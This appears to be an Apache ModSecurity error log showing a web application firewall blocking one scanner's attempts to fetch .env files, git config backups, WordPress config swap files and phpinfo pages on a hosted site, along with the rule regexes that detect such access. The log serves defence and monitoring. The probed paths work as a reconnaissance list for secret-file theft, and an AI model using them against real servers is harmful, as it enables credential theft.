[Tue May 26 13:39:37.438849 2026] [security2:error] [pid 536875:tid 537072] [client 45.148.10.95:9696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env~"] [unique_id "ahVVQer_-FTveSGlx1HqlwAAAMg"]
[Tue May 26 13:39:37.523341 2026] [security2:error] [pid 544395:tid 544575] [client 45.148.10.95:9760] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.git/config~"] [unique_id "ahVVQRmrs7g3RMCdp8XJGgAAADI"]
[Tue May 26 13:39:37.602798 2026] [security2:error] [pid 544395:tid 544651] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVQRmrs7g3RMCdp8XJBAAAAH4"]
[Tue May 26 13:39:37.609387 2026] [security2:error] [pid 544395:tid 544648] [client 45.148.10.95:9812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.git/config.bak"] [unique_id "ahVVQRmrs7g3RMCdp8XJHAAAAHs"]
[Tue May 26 13:39:37.612156 2026] [security2:error] [pid 544395:tid 544541] [client 45.148.10.95:9824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.git/config.old"] [unique_id "ahVVQRmrs7g3RMCdp8XJHQAAABA"]
[Tue May 26 13:39:38.969025 2026] [security2:error] [pid 544395:tid 544594] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVQhmrs7g3RMCdp8XJOgAAAEU"]
[Tue May 26 13:39:39.734482 2026] [security2:error] [pid 544395:tid 544550] [client 45.148.10.95:9680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/.wp-config.php.swp"] [unique_id "ahVVQxmrs7g3RMCdp8XJYQAAABk"]
[Tue May 26 13:39:39.800319 2026] [autoindex:error] [pid 544395:tid 544553] [client 45.148.10.95:9768] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:39.807814 2026] [autoindex:error] [pid 544395:tid 544587] [client 45.148.10.95:9812] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:39.875859 2026] [security2:error] [pid 544395:tid 544651] [client 45.148.10.95:9834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/ADMIN/.env"] [unique_id "ahVVQxmrs7g3RMCdp8XJaAAAAH4"]
[Tue May 26 13:39:40.041393 2026] [autoindex:error] [pid 544395:tid 544623] [client 45.148.10.95:9768] AH01276: Cannot serve directory /home2/whitece9/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:40.234443 2026] [security2:error] [pid 536875:tid 537083] [client 45.148.10.95:9880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/BACK/.env"] [unique_id "ahVVROr_-FTveSGlx1Hq2QAAANM"]
[Tue May 26 13:39:40.279971 2026] [security2:error] [pid 544395:tid 544571] [client 45.148.10.95:9700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/API/.env"] [unique_id "ahVVRBmrs7g3RMCdp8XJcgAAAC4"]
[Tue May 26 13:39:40.396661 2026] [security2:error] [pid 536875:tid 537054] [client 45.148.10.95:9864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/Be/.env"] [unique_id "ahVVROr_-FTveSGlx1Hq2wAAALY"]
[Tue May 26 13:39:40.397014 2026] [security2:error] [pid 536875:tid 537032] [client 45.148.10.95:9796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/APP/.env"] [unique_id "ahVVROr_-FTveSGlx1Hq3AAAAKA"]
[Tue May 26 13:39:40.492507 2026] [security2:error] [pid 544395:tid 544605] [client 45.148.10.95:9834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/Api/.env"] [unique_id "ahVVRBmrs7g3RMCdp8XJdwAAAFA"]
[Tue May 26 13:39:40.570391 2026] [security2:error] [pid 536875:tid 537013] [client 45.148.10.95:9696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/BACKEND/.env"] [unique_id "ahVVROr_-FTveSGlx1Hq3wAAAI0"]
[Tue May 26 13:39:40.596739 2026] [security2:error] [pid 544395:tid 544613] [client 45.148.10.95:9744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/Backend/.env"] [unique_id "ahVVRBmrs7g3RMCdp8XJfAAAAFg"]
[Tue May 26 13:39:40.692854 2026] [security2:error] [pid 536875:tid 537044] [client 45.148.10.95:9796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/BE/.env"] [unique_id "ahVVROr_-FTveSGlx1Hq5wAAAKw"]
[Tue May 26 13:39:40.971503 2026] [security2:error] [pid 544395:tid 544538] [client 45.148.10.95:9878] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVVRBmrs7g3RMCdp8XJkgAAAA0"]
[Tue May 26 13:39:41.082366 2026] [security2:error] [pid 544395:tid 544598] [client 45.148.10.95:9824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/admin-app/.env"] [unique_id "ahVVRRmrs7g3RMCdp8XJlwAAAEk"]
[Tue May 26 13:39:41.222977 2026] [security2:error] [pid 544395:tid 544536] [client 45.148.10.95:9744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/admin/phpinfo.php"] [unique_id "ahVVRRmrs7g3RMCdp8XJnAAAAAs"]
[Tue May 26 13:39:41.229022 2026] [security2:error] [pid 544395:tid 544603] [client 45.148.10.95:9824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/administrator/.env"] [unique_id "ahVVRRmrs7g3RMCdp8XJnQAAAE4"]
[Tue May 26 13:39:41.240398 2026] [security2:error] [pid 544395:tid 544620] [client 45.148.10.95:9768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/api-backend/.env"] [unique_id "ahVVRRmrs7g3RMCdp8XJngAAAF8"]
[Tue May 26 13:39:41.267902 2026] [security2:error] [pid 536875:tid 537129] [client 45.148.10.95:9782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/api/.env"] [unique_id "ahVVRer_-FTveSGlx1Hq_QAAAQE"]
[Tue May 26 13:39:41.272696 2026] [security2:error] [pid 536875:tid 537028] [client 45.148.10.95:9796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/admin_phpinfo.php"] [unique_id "ahVVRer_-FTveSGlx1Hq_gAAAJw"]
[Tue May 26 13:39:41.312732 2026] [security2:error] [pid 544395:tid 544542] [client 45.148.10.95:9848] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/api-node/.env"] [unique_id "ahVVRRmrs7g3RMCdp8XJpwAAABE"]
[Tue May 26 13:39:41.457860 2026] [security2:error] [pid 544395:tid 544560] [client 45.148.10.95:9834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/api/info.php"] [unique_id "ahVVRRmrs7g3RMCdp8XJrAAAACM"]
[Tue May 26 13:39:41.521478 2026] [security2:error] [pid 536875:tid 537110] [client 45.148.10.95:9872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/api/phpinfo.php"] [unique_id "ahVVRer_-FTveSGlx1HrEwAAAO4"]
[Tue May 26 13:39:41.768846 2026] [security2:error] [pid 536875:tid 537087] [client 45.148.10.95:9788] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/apis/.env"] [unique_id "ahVVRer_-FTveSGlx1HrIAAAANc"]
[Tue May 26 13:39:41.810083 2026] [security2:error] [pid 536875:tid 537059] [client 45.148.10.95:9880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/app/.env"] [unique_id "ahVVRer_-FTveSGlx1HrIwAAALs"]
[Tue May 26 13:39:41.869681 2026] [security2:error] [pid 536875:tid 537010] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVRer_-FTveSGlx1HrDAAAAIo"]
[Tue May 26 13:39:42.070533 2026] [security2:error] [pid 544395:tid 544643] [client 45.148.10.95:39874] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/apps/.env"] [unique_id "ahVVRhmrs7g3RMCdp8XJzAAAAHY"]
[Tue May 26 13:39:42.092398 2026] [security2:error] [pid 536875:tid 537013] [client 45.148.10.95:9730] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/application/.env"] [unique_id "ahVVRur_-FTveSGlx1HrMwAAAI0"]
[Tue May 26 13:39:42.407006 2026] [security2:error] [pid 536875:tid 537079] [client 45.148.10.95:9880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/back-api/.env"] [unique_id "ahVVRur_-FTveSGlx1HrRwAAAM8"]
[Tue May 26 13:39:42.408193 2026] [security2:error] [pid 544395:tid 544642] [client 45.148.10.95:39910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/back-end/.env"] [unique_id "ahVVRhmrs7g3RMCdp8XJ4gAAAHU"]
[Tue May 26 13:39:42.458864 2026] [security2:error] [pid 544395:tid 544645] [client 45.148.10.95:9824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/back/.env"] [unique_id "ahVVRhmrs7g3RMCdp8XJ4wAAAHg"]
[Tue May 26 13:39:42.467484 2026] [security2:error] [pid 536875:tid 537041] [client 45.148.10.95:39878] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/backend-api/.env"] [unique_id "ahVVRur_-FTveSGlx1HrSwAAAKk"]
[Tue May 26 13:39:42.468677 2026] [security2:error] [pid 544395:tid 544537] [client 45.148.10.95:39912] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/backend/.env"] [unique_id "ahVVRhmrs7g3RMCdp8XJ5AAAAAw"]
[Tue May 26 13:39:42.599154 2026] [security2:error] [pid 544395:tid 544530] [client 45.148.10.95:9812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/backup/.env"] [unique_id "ahVVRhmrs7g3RMCdp8XJ6gAAAAU"]
[Tue May 26 13:39:42.612455 2026] [security2:error] [pid 536875:tid 537118] [client 45.148.10.95:9782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/beta/.env"] [unique_id "ahVVRur_-FTveSGlx1HrUwAAAPY"]
[Tue May 26 13:39:42.638607 2026] [security2:error] [pid 536875:tid 537058] [client 45.148.10.95:9788] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/be/.env"] [unique_id "ahVVRur_-FTveSGlx1HrVAAAALo"]
[Tue May 26 13:39:42.761950 2026] [security2:error] [pid 544395:tid 544555] [client 45.148.10.95:9824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/client/.env"] [unique_id "ahVVRhmrs7g3RMCdp8XJ8AAAAB4"]
[Tue May 26 13:39:42.790411 2026] [security2:error] [pid 544395:tid 544532] [client 45.148.10.95:39910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/cms/.env"] [unique_id "ahVVRhmrs7g3RMCdp8XJ8wAAAAc"]
